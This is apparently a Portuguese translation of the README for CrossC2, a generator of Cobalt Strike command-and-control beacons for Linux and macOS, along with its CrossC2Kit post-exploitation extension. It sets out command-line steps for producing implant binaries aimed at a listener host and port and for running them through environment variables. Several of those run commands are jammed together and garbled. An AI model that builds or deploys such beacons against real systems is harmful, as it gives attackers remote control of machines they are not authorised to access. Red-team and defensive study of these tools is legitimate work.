
gerar payload multiplataforma do CobaltStrike
LEIA-ME | Documento em Chinês | README_FULL | Documento Completo em Chinês
Suporte para avaliação de segurança do CobaltStrike em outras plataformas (Linux/MacOS/...), e inclui suporte ao desenvolvimento do módulo de pós-penetração Unix

- Download
Baixe CrossC2.cna genCrossC2 CrossC2Kit, modifique a configuração de CrossC2.cna
- Crie um listener e copie a chave
windows/beacon_https/reverse_https.cobaltstrike.beacon_keys do diretório do teamserver para o local
- Extensão de funções
CrossC2Kit_Loader.cna, incluindo carregamento de memória e outras funçõescs4.x, a função de gerenciamento de arquivos e lista de processos está ausente, você deve usar este Loader para reiniciar
- Gere o beacon
Use a função GUI fornecida pela cli ou cna para gerar o beacon por padrão
genCrossC2 <listener-ip/domain> <listener-port> <beacon_keys> <rebind_library;config.ini;c2profile.profile> <target_platform> <target_arch>
exemplo:
1. leia BEACON_KEY do caminho atual e gere BEACON do protocolo de tráfego C2Profile padrão
genCrossC2 127.0.0.1 5555 null null Linux x64 beacon.out
2. especifique o BEACON da biblioteca dinâmica do protocolo personalizado
genCrossC2 127.0.0.1 5555 .cobaltstrike.beacon_keys c2profile.so MacOS x64 beacon.out
3. especifique o C2Profile que precisa ser analisado automaticamente
genCrossC2 www.example.com 443 .cobaltstrike.beacon_keys ";;c2profile.profile" Linux x64 beacon.out
Configurações mais avançadas podem ser encontradas na documentação: 📄Referência
- Execute o beacon
export CCPATH=/opt/ && /tmp/c2/tmp/c2 /tmp/c2-rebind.soexport CCHOST=127.0.0.1 && export CCPORT=443 && /tmp/c2export CCDEBUG=1 && /tmp/c2CrossC2Kit: https://github.com/CrossC2/CrossC2Kit
CrossC2Kit é uma expansão de infiltração para a plataforma Unix derivada do CrossC2. Use o mecanismo de script de código aberto Aggressor Script. Pode ser usado para criar automação para simular o processo de operação da Red Team e expandir o cliente CobaltStrike.
CrossC2Kit é herdado das funcionalidades originais do CobaltStrike, portanto, a gramática de desenvolvimento e escrita ainda referencia a documentação oficial: https://trial.cobaltstrike.com/aggressor-script/index.html
Mas possui algumas extensões de API sobre o CrossC2 para controlar o beacon da plataforma Unix
API: 📄Referência
Demo: 
Apenas para uso interno por empresas e organizações, este framework possui um certo grau de instabilidade. Não profissionais não estão autorizados a usá-lo. Ninguém deve usá-lo para fins ilegais e lucratividade. Além disso, publicar versão modificada não autorizada também é proibido, ou então arcar com responsabilidades legais.
Agradecimentos a @Emma pelo Logotipo projetado para o CrossC2, que é projetado no estilo das séries Armitage e CobaltStrike.
| CS3.14 (correções de bugs) | CS4.0 | CS4.X (4.1~4.8) |
|---|
| Branch master | ✅ | ||
| Branch cs4.0 | ✅ | ||
| Branch cs4.1 | ✅ | ||
| Página de Release <= v2.1 | ✅ | ||
| Página de Release >= v2.2 | ✅ |